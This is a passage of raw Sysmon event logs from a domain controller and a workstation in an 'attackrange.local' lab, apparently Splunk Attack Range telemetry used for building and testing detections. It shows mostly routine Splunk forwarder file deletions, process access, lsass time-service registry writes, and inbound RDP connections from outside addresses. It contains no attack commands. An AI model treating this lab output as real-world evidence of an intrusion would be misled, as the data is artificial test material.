23542300x80000000000000001048101Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:56.309{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC922B1368235F8B6DB1210106C41AC5,SHA256=3AEF284F9C8A47C80DE88E036378845479ACB7C7D6AE5222AAE1E1EB2B6C3FC5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048100Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:53.758{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49228-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001048099Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:56.025{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8884-6151-F279-00000000FC01}5068C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048098Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:56.025{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048097Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:56.025{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048096Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:56.025{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048095Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:56.025{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048094Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:56.025{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8884-6151-F279-00000000FC01}5068C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048093Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:56.025{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8884-6151-F279-00000000FC01}5068C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048092Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:56.010{5EBD8912-8884-6151-F279-00000000FC01}5068C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048103Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:57.355{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7A76B02C83375AFACC6F830C02EEC7A,SHA256=9D352B6742230FB0EA5969CFDDA8A82A1688E06AB4A449B908657C505C50ADCA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976660Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:54.037{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-45284-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976659Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:57.325{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B023928E945C9C10E483FF4ED9EF6472,SHA256=4F389ECD2BCF613C0317D0E41BEC6C7ABDFFA0E2C3504B9D1092F09BEBDC475C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976661Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:58.341{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E37652AE5E6D5AAFAA6999A80C56166F,SHA256=EDF77633C1A029012CD12274E1A0CE57238600ACDBEF79BC762DD85E0DF599BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048104Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:58.392{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0370329534A059B280666B5D8EC787F1,SHA256=81D06FC61F09CAFC94D95EB54ECEA2C017228F238C46ADA45C9D04367EB659A5,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000976673Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:01:59.825{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000976672Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:01:59.825{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fc53043) 13241300x8000000000000000976671Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:01:59.825{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b375-0xf2877b12) 13241300x8000000000000000976670Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:01:59.825{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b37e-0x544be312) 13241300x8000000000000000976669Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:01:59.825{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b386-0xb6104b12) 13241300x8000000000000000976668Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:01:59.825{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000976667Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:01:59.825{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fc53043) 13241300x8000000000000000976666Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:01:59.825{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b375-0xf2877b12) 13241300x8000000000000000976665Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:01:59.825{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b37e-0x544be312) 13241300x8000000000000000976664Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:01:59.825{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b386-0xb6104b12) 23542300x8000000000000000976663Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:59.356{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D44FFB7A0885F365D828F7F2D62D5C6,SHA256=2664978BC84805B0939480E1D79591DD7613978B9EA9CBD1EBB706B8AC5FD3ED,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048107Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:57.647{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64115-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048106Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:59.441{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=509EE7AA0800E47725D1230517729079,SHA256=042F5986A702C2672FC9E6D734969C41E48AA8075A212AF94BDD7494AB9AFAD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976662Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:59.200{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F53EE6ABEB9125DA2AB3A4B430C0D26,SHA256=8E5AB21FE9D2EE013EFAA2515BDAACB1E207F813A17FC7AADEFCB0586B4DFB2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048105Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:59.298{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FFA2F4E54E0B82F11FFC9344CDB00E93,SHA256=9E4F36951B868272C7FBA7D0954F04C6F0475116E967169F907E4D11111EC4E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976674Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:00.356{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27554E3925A6DD899BA18A5BDBDE8DD2,SHA256=E28D9ECC0FF2547145A3BB2ADDBA5103A7B8E9F8CFF3E06CFCD570318E157C62,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048109Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:58.902{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49229-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048108Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:00.457{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9C7D0C6EA31F146A654581A755408F2,SHA256=BD29F6FDD8E28BC734078DEB0C149C17CC520AF9C80D9C1F83332FC02C282D81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048111Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:01.475{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAAFA493853EA55D1BECD838B604BF8F,SHA256=5C52A849F676C7FB99C5732B6200F7837BE731218C51F1660F8E44114F39B641,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976675Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:01.372{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13E18619A6747BF312FB294DC6865DBD,SHA256=F2B174BEA647F7F0CB413D18FB64D7CA46C01EFE7D92A4C7574BF4F81256F3D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048110Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:01.057{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C1A852F9AC01AEA7F3BAF142D94FBC67,SHA256=5478A74B00738C242AAFE975400FAC986DC55E90BBE1CB6DAA9D172927F00501,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976680Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:02.623{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84454E77CE77B1DCCF5A2AB77BA67B9D,SHA256=EE3F39773195EA11C3F02D85C247AD77773FC0A9CF9A2F4DBF2966790FFC140A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976679Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:59.607{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58710-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976678Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:59.273{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-16787-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976677Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:58.891{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59265-false10.0.1.12-8000- 23542300x8000000000000000976676Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:02.388{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=648C71A56C3083ED7F43D4426ED262FC,SHA256=347D15D2A5F9FD04F4156CE5CE286389262815C969EA9FFF33111386275E8551,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048113Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:02.495{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=949068DEC749B58118C31CC5A1E9D436,SHA256=8105799643E3C43DD5F7DED5CD11608E62B605D27D32D43179F26101F5A30B77,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048112Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:59.201{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57725-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048114Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:03.495{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6538C14E7818D7BC3E105F5F710EE88,SHA256=FBE477412A552DCE78C63DC4FD08CC9C3D701B1C91AC350504179F72888E6658,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976681Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:03.388{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71D266D611BB117D940336B516D4C9B7,SHA256=85DEB8BFE2DADA81B50240419AC417B21A6FD17C13C5E442FDF9D391ED0C321F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976684Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:01.173{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59628-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976683Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:04.419{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FC27050F14BA3208E77BA38149405836,SHA256=F673694D433EAB64E2679235882C32DCBA422AAF5B0EF05E17148CEFC9A36BF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976682Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:04.388{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A220A78F789CF249E5E64DD2FB271C3A,SHA256=D1CF91DB5788320BEAF9DF63CAF7A7A91DC0068E8E90A1B1D024C0FFF721BB52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048115Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:04.511{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CBF3DD4792D7F8985BFB3A915D0FEA4,SHA256=AF707F46829F9302B925200FF4DE9B9E62A6FFF43DFA1438718AE11498A37CF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976685Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:05.404{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64E914F04BDF02CE082104046E5B9F78,SHA256=E3B580CC92BFAD7A5C5B739CA6F9924C6215DD5ABECDEE02E67A29C94510A123,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048116Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:05.526{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16EA3D7CB18832417389981D3F7CEF56,SHA256=AEAB91A98CC6029ED163C560332BDBC3FB834EC5C9A9F271F031D9F731B1C9F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976687Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:06.622{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT 